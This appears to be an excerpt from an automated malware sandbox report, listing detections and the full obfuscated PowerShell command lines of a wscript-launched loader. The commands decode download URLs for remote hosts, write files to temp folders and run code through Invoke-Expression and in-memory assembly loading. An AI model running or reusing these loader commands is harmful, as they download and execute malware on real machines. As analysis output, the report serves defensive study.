            Source: Yara matchFile source: 0000000E.00000002.3250010228.0000000005A14000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2692569252.00000214A36AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Found suspicious powershell code related to unpacking or dynamic code loading
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Ralph)$global:Rationernes = [System.Text.Encoding]::ASCII.GetString($Metalbearing)$global:Ferrimagnetic=$Rationernes.substring(320257,28981)<#Tinkler Apatetic Tuberkulosestationen #>
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Dreegh $Kloakeringsarbejder $Oprrsomraadet), (Sprhjulene47 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Afslidt = [AppDomain]::CurrentDomain.GetAssembli
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Flimsier)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Forsat, $false).DefineType($Symplesite, $Anfgtel
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Ralph)$global:Rationernes = [System.Text.Encoding]::ASCII.GetString($Metalbearing)$global:Ferrimagnetic=$Rationernes.substring(320257,28981)<#Tinkler Apatetic Tuberkulosestationen #>
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Hovedstrukturernes)$global:Lvhytterne = [System.Text.Encoding]::ASCII.GetString($Abjudicate)$global:Skikkelsens=$Lvhytterne.substring(314784,26302)<#Vigtigpraasen Manipulationssproge
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Nicodemite $Skadefries $Mismatching), (confederalist @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:tery = [AppDomain]::CurrentDomain.GetAssemblies()$glob
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Aguardiente)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Administrationsgrundlagenes, $false).DefineTy
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Hovedstrukturernes)$global:Lvhytterne = [System.Text.Encoding]::ASCII.GetString($Abjudicate)$global:Skikkelsens=$Lvhytterne.substring(314784,26302)<#Vigtigpraasen Manipulationssproge
            Suspicious powershell command line found
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$gdnings = 1;$Tripetalous='S';$Tripetalous+='ubstrin';$Tripetalous+='g';Function Teucrium($Gdskes){$Expirable=$Gdskes.Length-$gdnings;For($Heltemodiges=4; $Heltemodiges -lt $Expirable; $Heltemodiges+=(5)){$Mirakeldoktorerne+=$Gdskes.$Tripetalous.Invoke($Heltemodiges, $gdnings);}$Mirakeldoktorerne;}function Regulerbare($Reticularia){& ($Bestandigst) ($Reticularia);}$Planlggelserne235=Teucrium 'LeopMC,mpo Croz FreiPrpol.hrilM rgaBri /Pree5 C r. Hex0Pl n Embr( ha,W Po iHemon.lgndPreeo eksw,olisSttt ,ppNupt T Yie Red1ud.i0 Mul.Fodb0 Ska; Skr AssuWByttiOvernSe.s6.oti4El.x; Tre DepexWhis6U mo4 De,;Vsk, Alir,entv Stt:.aus1,esu2 Pic1Fagb.Cryp0 M t)W.tc D.lgGOpree npcTrickStigoSkgg/,jle2 Kry0 Me 1S lt0Stoc0Cruo1Frkk0Sahu1Skru KontFSkaniPertrUpcre Kiaf ValoNdrixLavr/Konv1Floc2Scou1Appl.,ont0Stru ';$improvers=Teucrium 'ArbeUDoubsTaleePianrTarv-,rogATwitgSclae P.lnte stKlas ';$Ovariectomize=Teucrium 'A rthSemit MastSuffpDykksNonp: Saa/Nedj/OrtoeGensu Lymrjyd.oPimepBegirNgomoF,rst Jere,agncanstt FidiSocieVir,. T sr.fproCh.r/GlasMTri,e CiktArb,hmargiSemin AaskNice1phle. TaktNonrhKdlsnOver ';$Astor=Teucrium 'Nonf> nd ';$Bestandigst=Teucrium ' PleiL.doeSp,lxSkit ';$Executry203='smittefaren';Regulerbare (Teucrium 'pugiSTecoePelstDeta-ventCFl.loDelinInddtPrepeTilbnFreet Taa Lill-Ex.ePBehea.psot Ab hPeri RakeT K,o:Gemm\AdjuNTartvBossn oce MatlTemps,obbeeu,o. FortEpipxEsthtBifr Whis-GarbV RefaTor lUndeuBoreeHyl Pier$BlysE remxRe.peBigacDionuBnsktNonsr A,kyDoci2Nedv0Term3r,ma; Men ');Regulerbare (Teucrium 'Untri Ov.fHaem Sal,(Tudbt Brue Kunsapp tZebr- alpNo sa .irt O qh Bi NoneTGerm:Ecot\Re pNdor v Ston Mone AcelToilsAgroeAfsk.Tre.tFro x DeptHjlp)Euph{QuiceAfsyxKvadiTe.rtSqui}M,le;Mi.l ');$Teariness = Teucrium 'FrereDynecScrahimp.o Gid brul%.ddea,uffp Hi pFilhdMadnaNi,at Ma,aSkum%Ha g\BeavPOv rr NoleDiscs Mani iklgDiagnPappa t,slVed 2Shir3Bu g.syndH,alla Konl Uni Fl,&Pose&Eate BylieBillcAfhohPanto Kns Ve s$tota ';Regulerbare (Teucrium 'P.lu$C.shgMa,tlAbonoEnthbAspeaUsorlK ap:Fores Timu Av,bAn ri Alinram,sOprre FrerConjtSpariUn coCronnKass= Tek(Sprnc KremDertdM.lj Felt/ HaycMerc Over$romeT ,rleLeveaScrur Pa.i MisnKalde orrsRaglsBewh)Wamu ');Regulerbare (Teucrium 'Sku,$HavigAcrolD.inoVipebLmlea banlM rk: EarTDiobaWeevaUdbyl Ly mAffao F,rdB,rti C,ag Spkh Udse.ndbdAmin= Con$ tevOCarov.atra OdorPolyiRepreOvercTordtSor.oStorm acciBe,nzSamdeBybu.Mil,srek.pr onlDhoti usttLivs(afsk$ .obA RegsBrantDivioGeinrD.mo)A.me ');$Ovariectomize=$Taalmodighed[0];Regulerbare (Teucrium ' bra$ lobg MallT.lfoT rbbAfh.aSenelS,co:Pos D IderBerbiMetof A itlinesGimbp ProrGlewoEumeb Kval Skaedispm U seSkrur PensNois=.kvaND ugePaliw Vul- HarO egabArmojFlereAldrc F.rtCy e Man SUna yN nssBkketTabeeF,rgmHakk.Dis.N Exte BritBar,.BrieWEthieFan,bEfteCSaltlManni.lideBrnenBaa,t Tem ');Regulerbare (Teucrium 'foli$ rusDPleorAmtsiKlokfovertA sesRolap Te.rCil.oUdlubCretlG,beeI
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$gdnings = 1;$Tripetalous='S';$Tripetalous+='ubstrin';$Tripetalous+='g';Function Teucrium($Gdskes){$Expirable=$Gdskes.Length-$gdnings;For($Heltemodiges=4; $Heltemodiges -lt $Expirable; $Heltemodiges+=(5)){$Mirakeldoktorerne+=$Gdskes.$Tripetalous.Invoke($Heltemodiges, $gdnings);}$Mirakeldoktorerne;}function Regulerbare($Reticularia){& ($Bestandigst) ($Reticularia);}$Planlggelserne235=Teucrium 'LeopMC,mpo Croz FreiPrpol.hrilM rgaBri /Pree5 C r. Hex0Pl n Embr( ha,W Po iHemon.lgndPreeo eksw,olisSttt ,ppNupt T Yie Red1ud.i0 Mul.Fodb0 Ska; Skr AssuWByttiOvernSe.s6.oti4El.x; Tre DepexWhis6U mo4 De,;Vsk, Alir,entv Stt:.aus1,esu2 Pic1Fagb.Cryp0 M t)W.tc D.lgGOpree npcTrickStigoSkgg/,jle2 Kry0 Me 1S lt0Stoc0Cruo1Frkk0Sahu1Skru KontFSkaniPertrUpcre Kiaf ValoNdrixLavr/Konv1Floc2Scou1Appl.,ont0Stru ';$improvers=Teucrium 'ArbeUDoubsTaleePianrTarv-,rogATwitgSclae P.lnte stKlas ';$Ovariectomize=Teucrium 'A rthSemit MastSuffpDykksNonp: Saa/Nedj/OrtoeGensu Lymrjyd.oPimepBegirNgomoF,rst Jere,agncanstt FidiSocieVir,. T sr.fproCh.r/GlasMTri,e CiktArb,hmargiSemin AaskNice1phle. TaktNonrhKdlsnOver ';$Astor=Teucrium 'Nonf> nd ';$Bestandigst=Teucrium ' PleiL.doeSp,lxSkit ';$Executry203='smittefaren';Regulerbare (Teucrium 'pugiSTecoePelstDeta-ventCFl.loDelinInddtPrepeTilbnFreet Taa Lill-Ex.ePBehea.psot Ab hPeri RakeT K,o:Gemm\AdjuNTartvBossn oce MatlTemps,obbeeu,o. FortEpipxEsthtBifr Whis-GarbV RefaTor lUndeuBoreeHyl Pier$BlysE remxRe.peBigacDionuBnsktNonsr A,kyDoci2Nedv0Term3r,ma; Men ');Regulerbare (Teucrium 'Untri Ov.fHaem Sal,(Tudbt Brue Kunsapp tZebr- alpNo sa .irt O qh Bi NoneTGerm:Ecot\Re pNdor v Ston Mone AcelToilsAgroeAfsk.Tre.tFro x DeptHjlp)Euph{QuiceAfsyxKvadiTe.rtSqui}M,le;Mi.l ');$Teariness = Teucrium 'FrereDynecScrahimp.o Gid brul%.ddea,uffp Hi pFilhdMadnaNi,at Ma,aSkum%Ha g\BeavPOv rr NoleDiscs Mani iklgDiagnPappa t,slVed 2Shir3Bu g.syndH,alla Konl Uni Fl,&Pose&Eate BylieBillcAfhohPanto Kns Ve s$tota ';Regulerbare (Teucrium 'P.lu$C.shgMa,tlAbonoEnthbAspeaUsorlK ap:Fores Timu Av,bAn ri Alinram,sOprre FrerConjtSpariUn coCronnKass= Tek(Sprnc KremDertdM.lj Felt/ HaycMerc Over$romeT ,rleLeveaScrur Pa.i MisnKalde orrsRaglsBewh)Wamu ');Regulerbare (Teucrium 'Sku,$HavigAcrolD.inoVipebLmlea banlM rk: EarTDiobaWeevaUdbyl Ly mAffao F,rdB,rti C,ag Spkh Udse.ndbdAmin= Con$ tevOCarov.atra OdorPolyiRepreOvercTordtSor.oStorm acciBe,nzSamdeBybu.Mil,srek.pr onlDhoti usttLivs(afsk$ .obA RegsBrantDivioGeinrD.mo)A.me ');$Ovariectomize=$Taalmodighed[0];Regulerbare (Teucrium ' bra$ lobg MallT.lfoT rbbAfh.aSenelS,co:Pos D IderBerbiMetof A itlinesGimbp ProrGlewoEumeb Kval Skaedispm U seSkrur PensNois=.kvaND ugePaliw Vul- HarO egabArmojFlereAldrc F.rtCy e Man SUna yN nssBkketTabeeF,rgmHakk.Dis.N Exte BritBar,.BrieWEthieFan,bEfteCSaltlManni.lideBrnenBaa,t Tem ');Regulerbare (Teucrium 'foli$ rusDPleorAmtsiKlokfovertA sesRolap Te.rCil.oUdlubCretlG,beeI
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Raakolde = 1;$Fornrmet='S';$Fornrmet+='ubstrin';$Fornrmet+='g';Function Circumflexes($Cumulet){$Semimonarchically=$Cumulet.Length-$Raakolde;For($Habitually=4; $Habitually -lt $Semimonarchically; $Habitually+=(5)){$Wenzel+=$Cumulet.$Fornrmet.Invoke($Habitually, $Raakolde);}$Wenzel;}function Jettes($trendy){&($Indbagendes) ($trendy);}$Simultansceners=Circumflexes 'Ark,MMervoAn.czVampiT lel ElelBlreaSy.o/Jagt5 ve.Seac0T,sp Ryg.( KrmW.urdiRiitn s rdPi do.orhwAllosHjem G,oN PraT.oli ,eg1Inte0Remb.Spra0Anal;Duct Ret.WVagtiAtomnskyt6Aced4 Non;Falc F.glx.art6Pseu4.icr;Rovf MilrGramvNert:Nara1H,lg2Rive1Unde.Sopr0Pres)Vrd. P.slG,ndeeCubacSkinkTilloOffp/Slib2Pl r0Ned,1Appe0Onyc0Ven,1 enn0Trfi1 Bre V deFMickiKonsr traeA.trf dr oQrscxSamm/Moor1Hard2 ,or1Werf.,yde0.uto ';$Optrins45=Circumflexes 'tidsUI.prsP,yceSkabrover-StemAUkeng,ondeLivinE,tetHera ';$Levemulighed=Circumflexes 'B,slhG,ldt MentInflpKo,m:Conf/Ke,d/,ndf8Ago.7 bal.Pige1Cann2.ejl1 Fer.,rol1Diet0Nona5 Ske..ata1 Bl,6Ex.e3Kast/SrmrD Kile Ne.tSkreeIndmn rot MyxiBe aoKonknConse BoynDesi.s,rtj.attaDissv toda Non ';$Cose=Circumflexes 'Skor>Undi ';$Indbagendes=Circumflexes 'Dm,niMilieSelsx Bar ';$Nutritionary133='Paakldtes';Jettes (Circumflexes 'Ch dSSonaeAutotAlda-UnmyC.rocoValgn,annt Ende.enin S.dtO er Can- NobP ixta Fo.tBindhMe.k VrdiTSorg:Baga\Pt.rFbureoPot,rOutshTot,j S.iuretrlillesFletbTikmr GabeSmaamRadesAmoreT ivs.lbn.MargtAircx iltSaut Pote-La dVKinea Boll SafuEncaeDiap ,npr$CausN IlluDiglt Tndr,nbriKon,tBra,iUn.koDegenSpydaTricr egnyKrim1K.ip3Erem3L.eb; Bri ');Jettes (Circumflexes 'Tr.ni.inkfHoo. Skil(Indit AroeUndesuafmtEpit-DrukpFareaSkibtDuplhAfid silTRuck:None\Sla,F Sgeo Bu,rTec.hobsejAp.puQuanlBloks ostbs,mmrP osePal.mSocisCudbe Pics A,m.Te rtBre,xDigit ,fl),era{Giske andxRe aiNacrtCham}Pg.e;Ergo ');$Ballplayers248 = Circumflexes ' nkeSpikc Udmhsiego lgu Eksp%S,paaBagepTaktpOtopdElemaimpetarchaTran%She,\ParaATrignKolltHo,eiangulSkrmltr.ke Anpa JounChr,1Umed4 C.s4Sur...lumGVilkrBel.oJe n Ef e&sa,m&D.ge UpfieBil cUnnah KreoN,np Ci.i$ Kri ';Jettes (Circumflexes 'Real$,eclgFalsl.nifoAxi,bWolfaAfselCoin:SgesFScrso vrmrBrbaaBronn kkek Tabr,obbiGre nResig Kr,s oltpOveruCafenOverksol t KureBagnt Bits .ps=Abd.(dab,cSju.mEl md ,in Ferr/Calcc Ch, F rs$BedrBPi radra,lSna lurfjpMarklDialaIrr.yIndve R,trSeiss Puz2Duct4Ba.h8Phot)Dri ');Jettes (Circumflexes 'Ha.l$SlvsgEftel nfoSt,ibM.inaTabplTick: SpeA MoklEctovSubte UneoRegilSndaiErodtDispemdresTol =Lnn,$MyndLRaskeSkilv W.veForbmStrauf rflGauki.azigYemehPreee TradDole.RegesEft.p Ci.lIndaiVar.tVa,e(Sume$EnheCFormo.dves Pree G.n)Spil ');$Levemulighed=$Alveolites[0];Jettes (Circumflexes 'Anbr$.addgU.trl ,taoim ebTa.ba.alclB,nk:BestS.orkk GibeM,aspJotatS yti ,uncCoa,=partNDagbe KecwUrok-,lafOwainb ejljSkrseUns.curo.t.onc B anSSvalyVands igmtM.sceJug mSoap.FascNPhyleFre,t iga..oncWHetee Cikb istCDeralkin iSporeMetanMapptF er ');Jet
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Raakolde = 1;$Fornrmet='S';$Fornrmet+='ubstrin';$Fornrmet+='g';Function Circumflexes($Cumulet){$Semimonarchically=$Cumulet.Length-$Raakolde;For($Habitually=4; $Habitually -lt $Semimonarchically; $Habitually+=(5)){$Wenzel+=$Cumulet.$Fornrmet.Invoke($Habitually, $Raakolde);}$Wenzel;}function Jettes($trendy){&($Indbagendes) ($trendy);}$Simultansceners=Circumflexes 'Ark,MMervoAn.czVampiT lel ElelBlreaSy.o/Jagt5 ve.Seac0T,sp Ryg.( KrmW.urdiRiitn s rdPi do.orhwAllosHjem G,oN PraT.oli ,eg1Inte0Remb.Spra0Anal;Duct Ret.WVagtiAtomnskyt6Aced4 Non;Falc F.glx.art6Pseu4.icr;Rovf MilrGramvNert:Nara1H,lg2Rive1Unde.Sopr0Pres)Vrd. P.slG,ndeeCubacSkinkTilloOffp/Slib2Pl r0Ned,1Appe0Onyc0Ven,1 enn0Trfi1 Bre V deFMickiKonsr traeA.trf dr oQrscxSamm/Moor1Hard2 ,or1Werf.,yde0.uto ';$Optrins45=Circumflexes 'tidsUI.prsP,yceSkabrover-StemAUkeng,ondeLivinE,tetHera ';$Levemulighed=Circumflexes 'B,slhG,ldt MentInflpKo,m:Conf/Ke,d/,ndf8Ago.7 bal.Pige1Cann2.ejl1 Fer.,rol1Diet0Nona5 Ske..ata1 Bl,6Ex.e3Kast/SrmrD Kile Ne.tSkreeIndmn rot MyxiBe aoKonknConse BoynDesi.s,rtj.attaDissv toda Non ';$Cose=Circumflexes 'Skor>Undi ';$Indbagendes=Circumflexes 'Dm,niMilieSelsx Bar ';$Nutritionary133='Paakldtes';Jettes (Circumflexes 'Ch dSSonaeAutotAlda-UnmyC.rocoValgn,annt Ende.enin S.dtO er Can- NobP ixta Fo.tBindhMe.k VrdiTSorg:Baga\Pt.rFbureoPot,rOutshTot,j S.iuretrlillesFletbTikmr GabeSmaamRadesAmoreT ivs.lbn.MargtAircx iltSaut Pote-La dVKinea Boll SafuEncaeDiap ,npr$CausN IlluDiglt Tndr,nbriKon,tBra,iUn.koDegenSpydaTricr egnyKrim1K.ip3Erem3L.eb; Bri ');Jettes (Circumflexes 'Tr.ni.inkfHoo. Skil(Indit AroeUndesuafmtEpit-DrukpFareaSkibtDuplhAfid silTRuck:None\Sla,F Sgeo Bu,rTec.hobsejAp.puQuanlBloks ostbs,mmrP osePal.mSocisCudbe Pics A,m.Te rtBre,xDigit ,fl),era{Giske andxRe aiNacrtCham}Pg.e;Ergo ');$Ballplayers248 = Circumflexes ' nkeSpikc Udmhsiego lgu Eksp%S,paaBagepTaktpOtopdElemaimpetarchaTran%She,\ParaATrignKolltHo,eiangulSkrmltr.ke Anpa JounChr,1Umed4 C.s4Sur...lumGVilkrBel.oJe n Ef e&sa,m&D.ge UpfieBil cUnnah KreoN,np Ci.i$ Kri ';Jettes (Circumflexes 'Real$,eclgFalsl.nifoAxi,bWolfaAfselCoin:SgesFScrso vrmrBrbaaBronn kkek Tabr,obbiGre nResig Kr,s oltpOveruCafenOverksol t KureBagnt Bits .ps=Abd.(dab,cSju.mEl md ,in Ferr/Calcc Ch, F rs$BedrBPi radra,lSna lurfjpMarklDialaIrr.yIndve R,trSeiss Puz2Duct4Ba.h8Phot)Dri ');Jettes (Circumflexes 'Ha.l$SlvsgEftel nfoSt,ibM.inaTabplTick: SpeA MoklEctovSubte UneoRegilSndaiErodtDispemdresTol =Lnn,$MyndLRaskeSkilv W.veForbmStrauf rflGauki.azigYemehPreee TradDole.RegesEft.p Ci.lIndaiVar.tVa,e(Sume$EnheCFormo.dves Pree G.n)Spil ');$Levemulighed=$Alveolites[0];Jettes (Circumflexes 'Anbr$.addgU.trl ,taoim ebTa.ba.alclB,nk:BestS.orkk GibeM,aspJotatS yti ,uncCoa,=partNDagbe KecwUrok-,lafOwainb ejljSkrseUns.curo.t.onc B anSSvalyVands igmtM.sceJug mSoap.FascNPhyleFre,t iga..oncWHetee Cikb istCDeralkin iSporeMetanMapptF er ');Jet
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$gdnings = 1;$Tripetalous='S';$Tripetalous+='ubstrin';$Tripetalous+='g';Function Teucrium($Gdskes){$Expirable=$Gdskes.Length-$gdnings;For($Heltemodiges=4; $Heltemodiges -lt $Expirable; $Heltemodiges+=(5)){$Mirakeldoktorerne+=$Gdskes.$Tripetalous.Invoke($Heltemodiges, $gdnings);}$Mirakeldoktorerne;}function Regulerbare($Reticularia){& ($Bestandigst) ($Reticularia);}$Planlggelserne235=Teucrium 'LeopMC,mpo Croz FreiPrpol.hrilM rgaBri /Pree5 C r. Hex0Pl n Embr( ha,W Po iHemon.lgndPreeo eksw,olisSttt ,ppNupt T Yie Red1ud.i0 Mul.Fodb0 Ska; Skr AssuWByttiOvernSe.s6.oti4El.x; Tre DepexWhis6U mo4 De,;Vsk, Alir,entv Stt:.aus1,esu2 Pic1Fagb.Cryp0 M t)W.tc D.lgGOpree npcTrickStigoSkgg/,jle2 Kry0 Me 1S lt0Stoc0Cruo1Frkk0Sahu1Skru KontFSkaniPertrUpcre Kiaf ValoNdrixLavr/Konv1Floc2Scou1Appl.,ont0Stru ';$improvers=Teucrium 'ArbeUDoubsTaleePianrTarv-,rogATwitgSclae P.lnte stKlas ';$Ovariectomize=Teucrium 'A rthSemit MastSuffpDykksNonp: Saa/Nedj/OrtoeGensu Lymrjyd.oPimepBegirNgomoF,rst Jere,agncanstt FidiSocieVir,. T sr.fproCh.r/GlasMTri,e CiktArb,hmargiSemin AaskNice1phle. TaktNonrhKdlsnOver ';$Astor=Teucrium 'Nonf> nd ';$Bestandigst=Teucrium ' PleiL.doeSp,lxSkit ';$Executry203='smittefaren';Regulerbare (Teucrium 'pugiSTecoePelstDeta-ventCFl.loDelinInddtPrepeTilbnFreet Taa Lill-Ex.ePBehea.psot Ab hPeri RakeT K,o:Gemm\AdjuNTartvBossn oce MatlTemps,obbeeu,o. FortEpipxEsthtBifr Whis-GarbV RefaTor lUndeuBoreeHyl Pier$BlysE remxRe.peBigacDionuBnsktNonsr A,kyDoci2Nedv0Term3r,ma; Men ');Regulerbare (Teucrium 'Untri Ov.fHaem Sal,(Tudbt Brue Kunsapp tZebr- alpNo sa .irt O qh Bi NoneTGerm:Ecot\Re pNdor v Ston Mone AcelToilsAgroeAfsk.Tre.tFro x DeptHjlp)Euph{QuiceAfsyxKvadiTe.rtSqui}M,le;Mi.l ');$Teariness = Teucrium 'FrereDynecScrahimp.o Gid brul%.ddea,uffp Hi pFilhdMadnaNi,at Ma,aSkum%Ha g\BeavPOv rr NoleDiscs Mani iklgDiagnPappa t,slVed 2Shir3Bu g.syndH,alla Konl Uni Fl,&Pose&Eate BylieBillcAfhohPanto Kns Ve s$tota ';Regulerbare (Teucrium 'P.lu$C.shgMa,tlAbonoEnthbAspeaUsorlK ap:Fores Timu Av,bAn ri Alinram,sOprre FrerConjtSpariUn coCronnKass= Tek(Sprnc KremDertdM.lj Felt/ HaycMerc Over$romeT ,rleLeveaScrur Pa.i MisnKalde orrsRaglsBewh)Wamu ');Regulerbare (Teucrium 'Sku,$HavigAcrolD.inoVipebLmlea banlM rk: EarTDiobaWeevaUdbyl Ly mAffao F,rdB,rti C,ag Spkh Udse.ndbdAmin= Con$ tevOCarov.atra OdorPolyiRepreOvercTordtSor.oStorm acciBe,nzSamdeBybu.Mil,srek.pr onlDhoti usttLivs(afsk$ .obA RegsBrantDivioGeinrD.mo)A.me ');$Ovariectomize=$Taalmodighed[0];Regulerbare (Teucrium ' bra$ lobg MallT.lfoT rbbAfh.aSenelS,co:Pos D IderBerbiMetof A itlinesGimbp ProrGlewoEumeb Kval Skaedispm U seSkrur PensNois=.kvaND ugePaliw Vul- HarO egabArmojFlereAldrc F.rtCy e Man SUna yN nssBkketTabeeF,rgmHakk.Dis.N Exte BritBar,.BrieWEthieFan,bEfteCSaltlManni.lideBrnenBaa,t Tem ');Regulerbare (Teucrium 'foli$ rusDPleorAmtsiKlokfovertA sesRolap Te.rCil.oUdlubCretlG,beeIJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$gdnings = 1;$Tripetalous='S';$Tripetalous+='ubstrin';$Tripetalous+='g';Function Teucrium($Gdskes){$Expirable=$Gdskes.Length-$gdnings;For($Heltemodiges=4; $Heltemodiges -lt $Expirable; $Heltemodiges+=(5)){$Mirakeldoktorerne+=$Gdskes.$Tripetalous.Invoke($Heltemodiges, $gdnings);}$Mirakeldoktorerne;}function Regulerbare($Reticularia){& ($Bestandigst) ($Reticularia);}$Planlggelserne235=Teucrium 'LeopMC,mpo Croz FreiPrpol.hrilM rgaBri /Pree5 C r. Hex0Pl n Embr( ha,W Po iHemon.lgndPreeo eksw,olisSttt ,ppNupt T Yie Red1ud.i0 Mul.Fodb0 Ska; Skr AssuWByttiOvernSe.s6.oti4El.x; Tre DepexWhis6U mo4 De,;Vsk, Alir,entv Stt:.aus1,esu2 Pic1Fagb.Cryp0 M t)W.tc D.lgGOpree npcTrickStigoSkgg/,jle2 Kry0 Me 1S lt0Stoc0Cruo1Frkk0Sahu1Skru KontFSkaniPertrUpcre Kiaf ValoNdrixLavr/Konv1Floc2Scou1Appl.,ont0Stru ';$improvers=Teucrium 'ArbeUDoubsTaleePianrTarv-,rogATwitgSclae P.lnte stKlas ';$Ovariectomize=Teucrium 'A rthSemit MastSuffpDykksNonp: Saa/Nedj/OrtoeGensu Lymrjyd.oPimepBegirNgomoF,rst Jere,agncanstt FidiSocieVir,. T sr.fproCh.r/GlasMTri,e CiktArb,hmargiSemin AaskNice1phle. TaktNonrhKdlsnOver ';$Astor=Teucrium 'Nonf> nd ';$Bestandigst=Teucrium ' PleiL.doeSp,lxSkit ';$Executry203='smittefaren';Regulerbare (Teucrium 'pugiSTecoePelstDeta-ventCFl.loDelinInddtPrepeTilbnFreet Taa Lill-Ex.ePBehea.psot Ab hPeri RakeT K,o:Gemm\AdjuNTartvBossn oce MatlTemps,obbeeu,o. FortEpipxEsthtBifr Whis-GarbV RefaTor lUndeuBoreeHyl Pier$BlysE remxRe.peBigacDionuBnsktNonsr A,kyDoci2Nedv0Term3r,ma; Men ');Regulerbare (Teucrium 'Untri Ov.fHaem Sal,(Tudbt Brue Kunsapp tZebr- alpNo sa .irt O qh Bi NoneTGerm:Ecot\Re pNdor v Ston Mone AcelToilsAgroeAfsk.Tre.tFro x DeptHjlp)Euph{QuiceAfsyxKvadiTe.rtSqui}M,le;Mi.l ');$Teariness = Teucrium 'FrereDynecScrahimp.o Gid brul%.ddea,uffp Hi pFilhdMadnaNi,at Ma,aSkum%Ha g\BeavPOv rr NoleDiscs Mani iklgDiagnPappa t,slVed 2Shir3Bu g.syndH,alla Konl Uni Fl,&Pose&Eate BylieBillcAfhohPanto Kns Ve s$tota ';Regulerbare (Teucrium 'P.lu$C.shgMa,tlAbonoEnthbAspeaUsorlK ap:Fores Timu Av,bAn ri Alinram,sOprre FrerConjtSpariUn coCronnKass= Tek(Sprnc KremDertdM.lj Felt/ HaycMerc Over$romeT ,rleLeveaScrur Pa.i MisnKalde orrsRaglsBewh)Wamu ');Regulerbare (Teucrium 'Sku,$HavigAcrolD.inoVipebLmlea banlM rk: EarTDiobaWeevaUdbyl Ly mAffao F,rdB,rti C,ag Spkh Udse.ndbdAmin= Con$ tevOCarov.atra OdorPolyiRepreOvercTordtSor.oStorm acciBe,nzSamdeBybu.Mil,srek.pr onlDhoti usttLivs(afsk$ .obA RegsBrantDivioGeinrD.mo)A.me ');$Ovariectomize=$Taalmodighed[0];Regulerbare (Teucrium ' bra$ lobg MallT.lfoT rbbAfh.aSenelS,co:Pos D IderBerbiMetof A itlinesGimbp ProrGlewoEumeb Kval Skaedispm U seSkrur PensNois=.kvaND ugePaliw Vul- HarO egabArmojFlereAldrc F.rtCy e Man SUna yN nssBkketTabeeF,rgmHakk.Dis.N Exte BritBar,.BrieWEthieFan,bEfteCSaltlManni.lideBrnenBaa,t Tem ');Regulerbare (Teucrium 'foli$ rusDPleorAmtsiKlokfovertA sesRolap Te.rCil.oUdlubCretlG,beeIJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Raakolde = 1;$Fornrmet='S';$Fornrmet+='ubstrin';$Fornrmet+='g';Function Circumflexes($Cumulet){$Semimonarchically=$Cumulet.Length-$Raakolde;For($Habitually=4; $Habitually -lt $Semimonarchically; $Habitually+=(5)){$Wenzel+=$Cumulet.$Fornrmet.Invoke($Habitually, $Raakolde);}$Wenzel;}function Jettes($trendy){&($Indbagendes) ($trendy);}$Simultansceners=Circumflexes 'Ark,MMervoAn.czVampiT lel ElelBlreaSy.o/Jagt5 ve.Seac0T,sp Ryg.( KrmW.urdiRiitn s rdPi do.orhwAllosHjem G,oN PraT.oli ,eg1Inte0Remb.Spra0Anal;Duct Ret.WVagtiAtomnskyt6Aced4 Non;Falc F.glx.art6Pseu4.icr;Rovf MilrGramvNert:Nara1H,lg2Rive1Unde.Sopr0Pres)Vrd. P.slG,ndeeCubacSkinkTilloOffp/Slib2Pl r0Ned,1Appe0Onyc0Ven,1 enn0Trfi1 Bre V deFMickiKonsr traeA.trf dr oQrscxSamm/Moor1Hard2 ,or1Werf.,yde0.uto ';$Optrins45=Circumflexes 'tidsUI.prsP,yceSkabrover-StemAUkeng,ondeLivinE,tetHera ';$Levemulighed=Circumflexes 'B,slhG,ldt MentInflpKo,m:Conf/Ke,d/,ndf8Ago.7 bal.Pige1Cann2.ejl1 Fer.,rol1Diet0Nona5 Ske..ata1 Bl,6Ex.e3Kast/SrmrD Kile Ne.tSkreeIndmn rot MyxiBe aoKonknConse BoynDesi.s,rtj.attaDissv toda 